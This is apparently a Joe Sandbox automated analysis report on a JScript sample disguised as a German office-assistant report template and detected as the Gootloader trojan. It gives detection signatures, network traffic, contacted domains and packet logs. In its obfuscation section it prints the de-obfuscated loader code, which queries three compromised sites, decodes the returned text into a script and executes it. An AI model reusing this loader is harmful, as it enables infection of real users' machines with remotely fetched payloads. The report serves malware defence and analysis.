Play interactive tour

Edit tour

Windows Analysis Report kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

Overview

General Information

Sample Name:	kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js
Analysis ID:	469226
MD5:	1bdbb940dbc6ca24585e77f05f0b9eb6
SHA1:	175078ffca7b3639144dda3ca217096e1730f571
SHA256:	81f823613cb5ce1cdd8500e2ac34741829a9a3dc92285e70c83748f990e5029c
Infos:
Most interesting Screenshot:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for submitted file

JScript performs obfuscated calls to suspicious functions

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Tries to load missing DLLs

May sleep (evasive loops) to hinder dynamic analysis

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

wscript.exe (PID: 4740 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

ReversingLabs: Detection: 34%

Source: unknown	HTTPS traffic detected: 217.30.63.12:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.124.194.166:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.6:49691 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: Joe Sandbox View	ASN Name: IMH-WESTUS IMH-WESTUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: unknown

DNS traffic detected: queries for: www.dischner-kartsport.de

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443

Source: unknown	HTTPS traffic detected: 217.30.63.12:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.124.194.166:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.6:49691 version: TLS 1.2

Source: kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Section loaded: winhttpcom.dll

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 98%

Source: kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

ReversingLabs: Detection: 34%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: classification engine

Classification label: mal64.evad.winJS@1/0@3/3

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Data Obfuscation:

JScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript)["Cr"+"e"+"at"+"e"+"Ob"+"j"+"ect"+""]("W"+"S"+"c"+"r"+"ip"+"t"+"."+"S"+"hel"+"l"+""); again = "H"+"KE"+"Y_"+"C"+"U"+"R"+"REN"+"T"+"_"+"U"+"S"+"E"+"R"+"\\FTqee\\";try { am["R"+"e"+"g"+"Rea"+"d"](again); } catch(e) { am["R"+"eg"+"Wri"+"t"+"e"+""](again, "", "RE"+"G"+"_"+"S"+"Z");d=16-13;fast=51;}try {floor[d](own('rmyixm?z\"p+g\'mphhhph.mhzcyrla=e\"s+/g\',+ ]fCa[lZs+e\')/;/ :qs.pstetnhd\'( ),;\' T}EcGa\'t(cnhe(peo).{q r{eytrutr n} ;f\"a6l4s1e8;7 2}\" +igf= g({q .)s\"t%aNtIuAsM O=D=S=N D2R0E0S)U %{\" v=a!r )S\" %=N IqA.MrOeDsSpNoDnRsEeSTUe%x\"t(;s ginfi r(t(SSt.nienmdneoxrOifv(n\"E@d\"n+agp+x\"E@.\"),\" l0l)e)h=S=.-t1p)i r{c SWWS\"c(rticpetj.bsOleeteape(r2C2.2t2p2i)r;c S}W (e lfsie ;{) 0S3 +=0 7S,.2r(e]p\"lratcseb(u\"s@\"\"[+)g(+g\"n@i\"r,t\"S\"o)t;. )v(amro dan a=r .Sh.traeMp l=a cge (;/)(\'\\PdT{T2H}L)M/Xgr,e vfruenSc.t2iLoMnX S(Mz\')( t{c erjebtOuertna eSrtCr.itnpgi.rfcrSoWm C=h aqr C{o d)e3( p<a rCs(e Ienlti(hzw, 1;00) +=3 0C) ;; ]}\")t;e nf.liololre[s3r]e(bao)d(n)o;m dWeS.cwrwiwp\"t,.\"Qmuoict.(c)a;i h}e .}w wewl\"s,e\" e{d .WtSrcorpispttr.askl-ereepn(h2c2s2i2d2.)w;w w}\" [C +=+ ;Z}'))();}catch(e){WScript.sleep(879977831);}gxue=floor; }function anonymous() {Z = ["www.dischner-kartsport.de","www.ehiac.com","www.edmondoberselli.net"]; C = 0; while (C < 3) { q = WScript.CreateObject('MSXML2.ServerXMLHTTP'); g = Math.random().toString()["substr"](2,70+30); if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {g=g+"278146";} try{ q.open('GET', 'https://'+Z[C]+'/search.php'+"?xyrmimzpgmhhhmzyl="+g, false); q.send(); }catch(e){ return false; } if (q.status === 200) { var S = q.responseText; if ((S.indexOf("@"+g+"@", 0))==-1) { WScript.sleep(22222); } else { S = S.replace("@"+g+"@",""); var a = S.replace(/(\d{2})/g, function (z) { return String.fromCharCode(parseInt(z,10)+30); }); floor[3](a)(); WScript.Quit(); } } else { WScript.sleep(22222); } C++;}

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 1520

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Domain query: www.dischner-kartsport.de
Source: C:\Windows\System32\wscript.exe	Domain query: www.edmondoberselli.net
Source: C:\Windows\System32\wscript.exe	Network Connect: 74.124.194.166 187	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Domain query: www.ehiac.com
Source: C:\Windows\System32\wscript.exe	Network Connect: 217.30.63.12 187	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 188.40.120.141 187	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting12	DLL Side-Loading1	Process Injection1	Virtualization/Sandbox Evasion1	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Scripting12	Security Account Manager	System Information Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js	35%	ReversingLabs	Script-JS.Trojan.Gootloader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.dischner-kartsport.de	217.30.63.12	true	true	unknown
ehiac.com	74.124.194.166	true	true	unknown
www.edmondoberselli.net	188.40.120.141	true	true	unknown
www.ehiac.com	unknown	unknown	true	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
74.124.194.166	ehiac.com	United States	22611	IMH-WESTUS	true
217.30.63.12	www.dischner-kartsport.de	Germany	29145	CENTAUR-GMBH-ASGermanyHeilbronnDE	true
188.40.120.141	www.edmondoberselli.net	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	469226
Start date:	21.08.2021
Start time:	17:34:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.evad.winJS@1/0@3/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .js Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.4.86 Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/469226/sample/kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

Simulations

Behavior and APIs

Time	Type	Description
17:38:53	API Interceptor	1x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
217.30.63.12	dDnee1fKQh.js	Get hash	malicious	Browse
188.40.120.141	#Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).js	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.dischner-kartsport.de	dDnee1fKQh.js	Get hash	malicious	Browse	217.30.63.12

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	5K8Pjo8QHd.exe	Get hash	malicious	Browse	195.201.225.248
	fortnitecheat.exe	Get hash	malicious	Browse	88.99.66.31
	cZI0If6mnd.exe	Get hash	malicious	Browse	88.99.66.31
	D2gV4FlavB.exe	Get hash	malicious	Browse	88.99.66.31
	oR4WWPYCJT.exe	Get hash	malicious	Browse	88.99.66.31
	0lLmr5aTAv.exe	Get hash	malicious	Browse	88.99.66.31
	QmW1IFq7XV.exe	Get hash	malicious	Browse	88.99.66.31
	3UkRbgI5Tg.exe	Get hash	malicious	Browse	88.99.66.31
	LTvcvGZerd.exe	Get hash	malicious	Browse	88.99.66.31
	eYFWNx5ilf.exe	Get hash	malicious	Browse	88.99.66.31
	37aMC5zfuw.exe	Get hash	malicious	Browse	88.99.66.31
	5Wd1tmqC18.exe	Get hash	malicious	Browse	195.201.225.248
	ccxgprT7sA.exe	Get hash	malicious	Browse	88.99.66.31
	1xDJNh6Npt.exe	Get hash	malicious	Browse	88.99.66.31
	3da0e424a6f1268f5682d59be1f83572479c28ca1fb7d.exe	Get hash	malicious	Browse	159.69.190.155
	YGAYa81MaG.exe	Get hash	malicious	Browse	195.201.225.248
	69148105747e1f74106dfb122777b7b91ea987e691403.exe	Get hash	malicious	Browse	195.201.225.248
	nsxL4VbVk0.exe	Get hash	malicious	Browse	195.201.225.248
	S2zxpWMps1.exe	Get hash	malicious	Browse	195.201.225.248
	69148105747e1f74106dfb122777b7b91ea987e691403.exe	Get hash	malicious	Browse	195.201.225.248
CENTAUR-GMBH-ASGermanyHeilbronnDE	dDnee1fKQh.js	Get hash	malicious	Browse	217.30.63.12
IMH-WESTUS	JXB TRANS_2021.08.09.xlsb	Get hash	malicious	Browse	192.145.234.101
	JXB TRANS_2021.08.09.xlsb	Get hash	malicious	Browse	192.145.234.101
	3HI5_CARGO_2021.08.09.xlsb	Get hash	malicious	Browse	192.145.234.101
	3HI5_CARGO_2021.08.09.xlsb	Get hash	malicious	Browse	192.145.234.101
	3HI5_CARGO_2021.08.09.xlsb	Get hash	malicious	Browse	192.145.234.101
	SVL5_TRANS_2021.08.09.xlsb	Get hash	malicious	Browse	192.145.234.101
	SVL5_TRANS_2021.08.09.xlsb	Get hash	malicious	Browse	192.145.234.101
	EFINAL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. June 26, 2021.exe	Get hash	malicious	Browse	104.247.74.6
	1FINAL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. July 20, 2021.exe	Get hash	malicious	Browse	104.247.74.6
	ALL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. June 26, 2021.exe	Get hash	malicious	Browse	104.247.74.6
	YsDRD3fSgQ.exe	Get hash	malicious	Browse	144.208.71.122
	Order 1744163.xlsb	Get hash	malicious	Browse	205.134.252.150
	plan-515372324.xlsb	Get hash	malicious	Browse	104.244.121.13
	dqVPlpmWYt.exe	Get hash	malicious	Browse	74.124.211.132
	chems.exe	Get hash	malicious	Browse	192.249.117.18
	Mohamed Abrar H CV.xlsx	Get hash	malicious	Browse	205.134.252.239
	INVOICE125POR.xlsx	Get hash	malicious	Browse	205.134.252.239
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	104.247.72.46
	PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lcNll.exe	Get hash	malicious	Browse	192.145.239.54
	PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lc.exe	Get hash	malicious	Browse	192.145.239.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	cZI0If6mnd.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	D2gV4FlavB.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	oR4WWPYCJT.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	0lLmr5aTAv.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	QmW1IFq7XV.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	3UkRbgI5Tg.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	LTvcvGZerd.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	eYFWNx5ilf.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	37aMC5zfuw.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	5Wd1tmqC18.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	69148105747e1f74106dfb122777b7b91ea987e691403.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	69148105747e1f74106dfb122777b7b91ea987e691403.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	6GEGqh0HIn.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	78742357.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	78742357.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	f6fa1e0673d37677b081dfe83a4a693038ce0a68d7c47.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	f6fa1e0673d37677b081dfe83a4a693038ce0a68d7c47.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	cmbHlS0x2G.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	E6H3chI4G8.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141
	np93rJ7mpP.exe	Get hash	malicious	Browse	74.124.194.166 217.30.63.12 188.40.120.141

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	5.394783887267911
TrID:
File name:	kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js
File size:	2891
MD5:	1bdbb940dbc6ca24585e77f05f0b9eb6
SHA1:	175078ffca7b3639144dda3ca217096e1730f571
SHA256:	81f823613cb5ce1cdd8500e2ac34741829a9a3dc92285e70c83748f990e5029c
SHA512:	631f0d86c274d5d0eaff3ca548e1de178a501a1613b82249a24b3f6062c8fe676ff2e823dcf163be32e78802e04a3511bd5922a1ee4b3e992d94a815b02f351e
SSDEEP:	48:4tqzUS7TR6X/AgqRZGqkry+LPx2VP5/lWAybIxZQGSq3+GGr6pmOBG1kul4CEW1f:X9QXgDoLSPKA9xZQGOcpPAkvCPBu8Xea
File Content Preview:	function thank(press,mother,meet,dark){return coast(press,mother,mark);}..function set(motion,sharp,mouth){desert=602;while(3420){try{sudden[desert]();}catch(current){sudden[1191191]=suggest;}desert++}}..function own(grass,other,felt){whose=better;love=""

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 21, 2021 17:38:22.269851923 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:25.282243967 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.298590899 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.325639963 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.326040030 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.333487034 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.360465050 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.360994101 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.361098051 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.361164093 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.361216068 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.361282110 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.361387014 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.372118950 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.372200012 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.372454882 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.380897999 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.408338070 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.454660892 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.506808043 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:31.576581001 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.600123882 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:31.642365932 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:36.521608114 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:36.521637917 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:36.521739960 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:36.523730993 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:36.523926020 CEST	49689	443	192.168.2.6	217.30.63.12
Aug 21, 2021 17:38:36.551579952 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:36.551623106 CEST	443	49689	217.30.63.12	192.168.2.6
Aug 21, 2021 17:38:54.041121960 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:54.213471889 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.213766098 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:54.216775894 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:54.388226032 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.390618086 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.390636921 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.390649080 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.390675068 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.390891075 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:54.392071962 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.439203978 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:54.611251116 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:54.618227959 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:54.829344988 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:55.208955050 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:55.253783941 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:58.211369038 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:58.211440086 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:58.211721897 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:58.212033987 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:58.212224960 CEST	49690	443	192.168.2.6	74.124.194.166
Aug 21, 2021 17:38:58.383522987 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:38:58.383610964 CEST	443	49690	74.124.194.166	192.168.2.6
Aug 21, 2021 17:39:17.585627079 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:17.609549046 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.609699011 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:17.611187935 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:17.635186911 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.635468006 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.635508060 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.635540962 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.635566950 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.635629892 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:17.635731936 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:17.641700029 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.660012007 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:17.684546947 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.695805073 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:17.756966114 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:17.802349091 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:22.762085915 CEST	443	49691	188.40.120.141	192.168.2.6
Aug 21, 2021 17:39:22.762429953 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:22.762686014 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:22.762821913 CEST	49691	443	192.168.2.6	188.40.120.141
Aug 21, 2021 17:39:22.788199902 CEST	443	49691	188.40.120.141	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 21, 2021 17:37:04.291953087 CEST	61182	53	192.168.2.6	8.8.8.8
Aug 21, 2021 17:37:04.329780102 CEST	53	61182	8.8.8.8	192.168.2.6
Aug 21, 2021 17:38:22.196891069 CEST	55673	53	192.168.2.6	8.8.8.8
Aug 21, 2021 17:38:22.256488085 CEST	53	55673	8.8.8.8	192.168.2.6
Aug 21, 2021 17:38:53.893151999 CEST	57773	53	192.168.2.6	8.8.8.8
Aug 21, 2021 17:38:54.039458036 CEST	53	57773	8.8.8.8	192.168.2.6
Aug 21, 2021 17:39:17.526221991 CEST	59986	53	192.168.2.6	8.8.8.8
Aug 21, 2021 17:39:17.582353115 CEST	53	59986	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 21, 2021 17:38:22.196891069 CEST	192.168.2.6	8.8.8.8	0x9204	Standard query (0)	www.dischner-kartsport.de	A (IP address)	IN (0x0001)
Aug 21, 2021 17:38:53.893151999 CEST	192.168.2.6	8.8.8.8	0x8b11	Standard query (0)	www.ehiac.com	A (IP address)	IN (0x0001)
Aug 21, 2021 17:39:17.526221991 CEST	192.168.2.6	8.8.8.8	0xc557	Standard query (0)	www.edmondoberselli.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 21, 2021 17:38:22.256488085 CEST	8.8.8.8	192.168.2.6	0x9204	No error (0)	www.dischner-kartsport.de		217.30.63.12	A (IP address)	IN (0x0001)
Aug 21, 2021 17:38:54.039458036 CEST	8.8.8.8	192.168.2.6	0x8b11	No error (0)	www.ehiac.com	ehiac.com		CNAME (Canonical name)	IN (0x0001)
Aug 21, 2021 17:38:54.039458036 CEST	8.8.8.8	192.168.2.6	0x8b11	No error (0)	ehiac.com		74.124.194.166	A (IP address)	IN (0x0001)
